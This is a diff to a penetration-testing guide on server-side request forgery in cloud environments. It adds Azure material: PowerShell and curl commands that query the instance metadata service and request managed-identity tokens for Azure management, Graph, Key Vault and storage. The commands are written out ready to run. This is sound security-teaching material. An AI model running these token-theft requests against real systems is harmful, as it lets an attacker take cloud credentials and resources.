GITBOOK-4454: No subject

pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md

@@ -451,6 +451,7 @@ curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&res
 {% endtab %}
 
 {% tab title="PS" %}
+{% code overflow="wrap" %}
 ```bash
 # Powershell
 Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
@@ -463,12 +464,13 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
 /metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 /metadata/instance/compute/userData?api-version=2021-01-01&format=text
 ```
+{% endcode %}
 {% endtab %}
 {% endtabs %}
 
-### Azure App Service
+### Azure App & Functions Services
 
-From the **env** you can get the values of `IDENTITY_HEADER` _and_ `IDENTITY_ENDPOINT`. That you can use to gather a token to speak with the metadata server.
+From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server.
 
 Most of the time, you want a token for one of these resources:
 
@@ -477,6 +479,13 @@ Most of the time, you want a token for one of these resources:
 * [https://graph.microsoft.com](https://graph.microsoft.com/)
 * [https://management.azure.com](https://management.azure.com/)
 
+{% hint style="danger" %}
+In the token requests use any of the parameters `object_id`, `client_id` or `msi_res_id` to indicate the managed identity you want to use ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)). If none, the **default MI will be used**.
+{% endhint %}
+
+{% tabs %}
+{% tab title="Bash" %}
+{% code overflow="wrap" %}
 ```bash
 # Check for those env vars to know if you are in an Azure app
 echo $IDENTITY_HEADER
@@ -486,11 +495,19 @@ echo $IDENTITY_ENDPOINT
 ls /opt/microsoft
 
 # Get management token
-curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
+curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
 # Get graph token
-curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
+curl "$IDENTITY_ENDPOINT?resource=https://graph.microsoft.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
+# Get vault token
+curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
+# Get storage token
+curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
 ```
+{% endcode %}
+{% endtab %}
 
+{% tab title="PS" %}
+{% code overflow="wrap" %}
 ```powershell
 # API request in powershell to management endpoint
 $Token = 'eyJ0eX..'
@@ -532,6 +549,9 @@ At line:1 char:1
  + FullyQualifiedErrorId :
 Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
 ```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
 
 ## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>